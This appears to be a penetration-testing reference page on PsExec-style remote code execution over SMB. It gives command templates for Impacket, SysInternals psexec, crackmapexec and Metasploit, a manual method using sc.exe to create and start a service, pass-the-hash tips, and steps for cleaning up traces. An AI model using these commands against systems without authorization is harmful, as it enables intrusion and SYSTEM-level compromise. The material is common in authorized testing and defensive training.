# PsExec (tcp/445)

PsExec is an old trick introduced by Mark Russinovich that allows to perform remote code execution over SMB (tcp/445).

This trick requires to establish an SMB session with the target and is performed through the following steps:

• Copy an executable file containing your payload to the target (usually under ADMIN$) • Create a new service that will run the executable • Start the service Once the payload has been executed, the following steps are performed to clean: • Delete the service • Delete the executable file Because it needs to interact with the Service Control Manager, it requires administrative privileges. Note The interaction with the Service Control Manager is possible via RPC called performed over the SMB session. Thus, no access to other RPC ports is required. #### Impacket - psexec.py psexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]  • if you don’t specify any [command], it will run a semi-interactive shell (C:\>) • if you don’t specify any [password], it will prompt you to input the password interactively Tip Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique. Info This tool will execute commands as NT AUTHORITY\system instead of the user specified for authentication. #### SysInternals - psexec.exe psexec.exe -nobanner -accepteula \\<HOST> -u [DOMAIN\]<USERNAME> -r [SERVICE NAME] [command]  Option Description -d Runs the command detached, i.e. in the background, without any interaction with stdin and stdout -s Runs the command with local SYSTEM privileges Tip Instead of specifying the username and password from the psexec.exe command line, you can also establish an SMB session with the target or start a new command prompt with NETONLY credentials. #### crackmapexec crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --exec-method smbexec -x <CMD>  Tip Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique. Note Use a capital -X to execute a PowerShell command instead. #### Metasploit - exploit/windows/smb/psexec use exploit/windows/smb/psexec set RHOST <IP ADDRESS> set SMBUser <USERNAME> set SMBDomain <DOMAIN> set SMBPass <PASSWORD> set payload <meterpreter/reverse shell/cmd> run -j  Tip The SMBPass parameter also supports using a hash instead of a password. Info This module will execute commands as NT AUTHORITY\system instead of the user specified for authentication. Warning This module will not display the output of the executed payload. #### Manual First, establish an SMB session with the target or start a new command prompt with NETONLY credentials: net use \\<HOST> /user:[DOMAIN\]<USERNAME> runas /netonly /user:[DOMAIN\]<USERNAME> cmd.exe  Then, copy the executable file to the target through the SMB session: copy \path\to\executable \\<HOST>\ADMIN$


Note

The ADMIN\$ share usually maps to C:\Windows. Even though this is the usual folder to perform psexec, you can drop the executable wherever you want.

Then, create and start the service that will call the executable:

sc.exe \\<HOST> create <SERVICE NAME> binpath= "cmd.exe /k <\path\to\executable>"
sc.exe \\<HOST> start <SERVICE NAME>


Info

As the Service Control Manager expect a service-executable, it might tell that the service failed to launch if you provide it with a standard executable. This is because the executable failed to perform the proper API call to tell the service successfully started. In that case, the Service Control Manager will terminate the command after 30 seconds. That’s the reason why we need to call cmd.exe /k before the desired command. Using this trick, the cmd.exe process will be terminated but not its child process.

Finally, you can clean the service and executable once the payload has been executed:

sc.exe \\<HOST> delete <SERVICE NAME>
del \\<HOST>\path\to\executable